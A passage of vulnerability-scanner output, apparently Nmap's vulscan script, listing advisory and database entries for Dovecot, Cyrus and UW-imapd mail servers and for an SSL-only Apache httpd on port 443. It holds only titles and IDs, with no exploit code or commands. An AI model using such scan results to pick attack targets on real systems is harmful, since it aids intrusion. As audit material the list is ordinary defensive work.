13315| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
13316| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
13317| [870471] RedHat Update for dovecot RHSA-2011:1187-01
13318| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
13319| [870153] RedHat Update for dovecot RHSA-2008:0297-02
13320| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
13321| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
13322| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
13323| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
13324| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
13325| [863272] Fedora Update for dovecot FEDORA-2011-7612
13326| [863115] Fedora Update for dovecot FEDORA-2011-7258
13327| [861525] Fedora Update for dovecot FEDORA-2007-664
13328| [861394] Fedora Update for dovecot FEDORA-2007-493
13329| [861333] Fedora Update for dovecot FEDORA-2007-1485
13330| [860845] Fedora Update for dovecot FEDORA-2008-9202
13331| [860663] Fedora Update for dovecot FEDORA-2008-2475
13332| [860169] Fedora Update for dovecot FEDORA-2008-2464
13333| [860089] Fedora Update for dovecot FEDORA-2008-9232
13334| [840950] Ubuntu Update for dovecot USN-1295-1
13335| [840668] Ubuntu Update for dovecot USN-1143-1
13336| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
13337| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
13338| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
13339| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
13340| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
13341| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
13342| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
13343| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
13344| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
13345| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
13346| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
13347| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
13348| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
13349| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
13350| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
13351| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
13352| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
13353| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
13354| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
13355| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
13356| [70259] FreeBSD Ports: dovecot
13357| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
13358| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
13359| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
13360| [66522] FreeBSD Ports: dovecot
13361| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
13362| [66233] SLES10: Security update for Cyrus IMAPD
13363| [66226] SLES11: Security update for Cyrus IMAPD
13364| [66222] SLES9: Security update for Cyrus IMAPD
13365| [65938] SLES10: Security update for Cyrus IMAPD
13366| [65723] SLES11: Security update for Cyrus IMAPD
13367| [65523] SLES9: Security update for Cyrus IMAPD
13368| [65479] SLES9: Security update for cyrus-imapd
13369| [65094] SLES9: Security update for cyrus-imapd
13370| [65010] Ubuntu USN-838-1 (dovecot)
13371| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
13372| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
13373| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
13374| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
13375| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
13376| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
13377| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
13378| [64898] FreeBSD Ports: cyrus-imapd
13379| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
13380| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
13381| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
13382| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
13383| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
13384| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
13385| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
13386| [62854] FreeBSD Ports: dovecot-managesieve
13387| [61916] FreeBSD Ports: dovecot
13388| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
13389| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
13390| [60528] FreeBSD Ports: dovecot
13391| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
13392| [60089] FreeBSD Ports: dovecot
13393| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
13394| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
13395| [55807] Slackware Advisory SSA:2005-310-06 imapd
13396| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
13397| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
13398| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
13399| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
13400| [52297] FreeBSD Ports: cyrus-imapd
13401| [52296] FreeBSD Ports: cyrus-imapd
13402| [52295] FreeBSD Ports: cyrus-imapd
13403| [52294] FreeBSD Ports: cyrus-imapd
13404| [52172] FreeBSD Ports: cyrus-imapd
13405|
13406| SecurityTracker - https://www.securitytracker.com:
13407| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
13408| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
13409| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
13410| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
13411|
13412| OSVDB - http://www.osvdb.org:
13413| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
13414| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
13415| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
13416| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
13417| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
13418| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
13419| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
13420| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
13421| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
13422| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
13423| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
13424| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
13425| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
13426| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
13427| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
13428| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
13429| [66113] Dovecot Mail Root Directory Creation Permission Weakness
13430| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
13431| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
13432| [66110] Dovecot Multiple Unspecified Buffer Overflows
13433| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
13434| [64783] Dovecot E-mail Message Header Unspecified DoS
13435| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
13436| [62796] Dovecot mbox Format Email Header Handling DoS
13437| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
13438| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
13439| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
13440| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
13441| [52906] UW-imapd c-client Initial Request Remote Format String
13442| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
13443| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
13444| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
13445| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
13446| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
13447| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
13448| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
13449| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
13450| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
13451| [43137] Dovecot mail_extra_groups Symlink File Manipulation
13452| [42979] Dovecot passdbs Argument Injection Authentication Bypass
13453| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
13454| [39876] Dovecot LDAP Auth Cache Security Bypass
13455| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
13456| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
13457| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
13458| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
13459| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
13460| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
13461| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
13462| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
13463| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
13464| [23281] Dovecot imap/pop3-login dovecot-auth DoS
13465| [23280] Dovecot Malformed APPEND Command DoS
13466| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
13467| [13242] UW-imapd CRAM-MD5 Authentication Bypass
13468| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
13469| [12042] UoW imapd Multiple Unspecified Overflows
13470| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
13471| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
13472| [911] UoW imapd AUTHENTICATE Command Remote Overflow
13473| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
13474| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
13475|_
13476443/tcp open ssl/ssl Apache httpd (SSL-only mode)
13477|_http-server-header: Apache/2
13478| vulscan: VulDB - https://vuldb.com:
13479| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
13480| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
13481| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
13482| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
13483| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
13484| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
13485| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
13486| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
13487| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
13488| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
13489| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
13490| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
13491| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
13492| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
13493| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
13494| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
13495| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
13496| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
13497| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
13498| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
13499| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
13500| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
13501| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
13502| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
13503| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
13504| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
13505| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
13506| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
13507| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
13508| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
13509| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
13510| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
13511| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
13512| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
13513| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
13514| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
13515| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
13516| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
13517| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
13518| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
13519| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
13520| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
13521| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
13522| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
13523| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
13524| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
13525| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
13526| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
13527| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
13528| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
13529| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
13530| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
13531| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
13532| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
13533| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
13534| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
13535| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
13536| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
13537| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
13538| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
13539| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
13540| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
13541| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
13542| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
13543| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
13544| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
13545| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
13546| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
13547| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
13548| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
13549| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
13550| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
13551| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
13552| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
13553| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
13554| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
13555| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
13556| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
13557| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
13558| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
13559| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
13560| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
13561| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
13562| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
13563| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
13564| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
13565| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
13566| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
13567| [136370] Apache Fineract up to 1.2.x sql injection
13568| [136369] Apache Fineract up to 1.2.x sql injection
13569| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
13570| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
13571| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
13572| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
13573| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
13574| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
13575| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
13576| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
13577| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
13578| [134416] Apache Sanselan 0.97-incubator Loop denial of service
13579| [134415] Apache Sanselan 0.97-incubator Hang denial of service
13580| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
13581| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
13582| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
13583| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
13584| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
13585| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
13586| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
13587| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
13588| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
13589| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
13590| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
13591| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
13592| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
13593| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
13594| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
13595| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
13596| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
13597| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
13598| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
13599| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
13600| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
13601| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
13602| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
13603| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
13604| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
13605| [131859] Apache Hadoop up to 2.9.1 privilege escalation
13606| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
13607| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
13608| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
13609| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
13610| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
13611| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
13612| [130629] Apache Guacamole Cookie Flag weak encryption
13613| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
13614| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
13615| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
13616| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
13617| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
13618| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
13619| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
13620| [130123] Apache Airflow up to 1.8.2 information disclosure
13621| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
13622| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
13623| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
13624| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
13625| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
13626| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
13627| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
13628| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
13629| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
13630| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
13631| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
13632| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
13633| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
13634| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
13635| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
13636| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
13637| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
13638| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
13639| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
13640| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
13641| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
13642| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
13643| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
13644| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
13645| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
13646| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
13647| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
13648| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
13649| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
13650| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
13651| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
13652| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
13653| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
13654| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
13655| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
13656| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
13657| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
13658| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
13659| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
13660| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
13661| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
13662| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
13663| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
13664| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
13665| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
13666| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
13667| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
13668| [127007] Apache Spark Request Code Execution
13669| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
13670| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
13671| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
13672| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
13673| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
13674| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
13675| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
13676| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
13677| [126346] Apache Tomcat Path privilege escalation
13678| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
13679| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
13680| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
13681| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
13682| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
13683| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
13684| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
